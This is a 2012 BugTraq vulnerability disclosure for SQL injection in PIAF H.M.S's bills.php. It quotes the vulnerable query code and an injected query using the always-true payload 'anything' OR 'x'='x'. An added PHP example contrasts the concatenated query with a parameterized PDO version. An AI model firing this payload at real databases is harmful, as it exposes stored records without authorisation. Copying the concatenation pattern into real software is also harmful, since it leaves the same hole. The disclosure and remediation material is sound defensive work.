BugTraq
PIAF H.M.S - SQL Injection
Oct 28 2012 12:29PM
Michał Błaszczak (blaszczakm gmail com)
# Exploit Title: PIAF H.M.S - SQL Injection
# Date: 28/10/2012
# Author: Michał Błaszczak
# Website: http://blaszczakm.blogspot.com
# Vendor Homepage: http://code.google.com/p/piafhms/
file: bills.php
line: 86-87
$query = $query . " ORDER BY ID DESC";
printf($query);
query:
SELECT * FROM `Users` WHERE `Room` = 'anything' OR 'x'='x' ORDER BY ID DESC
Michał Błaszczak
blaszczakm.blogspot.com
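
Added example, not part of the original post and not PIAF H.M.S code: the concatenation pattern behind the query above, next to a parameterized form that treats the same value as data. The PDO/SQLite in-memory database, the Name column, the sample rows, the function names, and the way the Room value reaches the query are assumptions made for illustration.

```php
<?php
// Constructed stand-in for the application's database (assumption: the
// real schema is not shown in the advisory beyond `Users`, `Room` and ID).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE Users (ID INTEGER PRIMARY KEY, Name TEXT, Room TEXT)');
$pdo->exec("INSERT INTO Users (Name, Room) VALUES
            ('alice', '101'), ('bob', '102'), ('carol', '103')");

// Pattern from the advisory: the value becomes part of the SQL text, so
// quote characters inside it change the structure of the WHERE clause.
// (Hypothetical function name.)
function usersByRoomConcat(PDO $pdo, string $room): array
{
    $query = "SELECT * FROM `Users` WHERE `Room` = '" . $room . "'";
    $query = $query . " ORDER BY ID DESC";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is fixed and the value is bound as a
// parameter, so it is only ever compared against the Room column.
// (Hypothetical function name.)
function usersByRoomPrepared(PDO $pdo, string $room): array
{
    $stmt = $pdo->prepare(
        'SELECT * FROM `Users` WHERE `Room` = :room ORDER BY ID DESC'
    );
    $stmt->execute([':room' => $room]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The Room value that produces the query quoted in the advisory.
$input = "anything' OR 'x'='x";

printf("concatenated query:  %d row(s)\n", count(usersByRoomConcat($pdo, $input)));
printf("prepared statement:  %d row(s)\n", count(usersByRoomPrepared($pdo, $input)));
printf("prepared, Room 102:  %d row(s)\n", count(usersByRoomPrepared($pdo, '102')));
```

The first count covers every row in the table because the injected condition is always true; the prepared statement matches no row for the same value and still returns the expected row for a legitimate room.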
Copyright 2010, SecurityFocus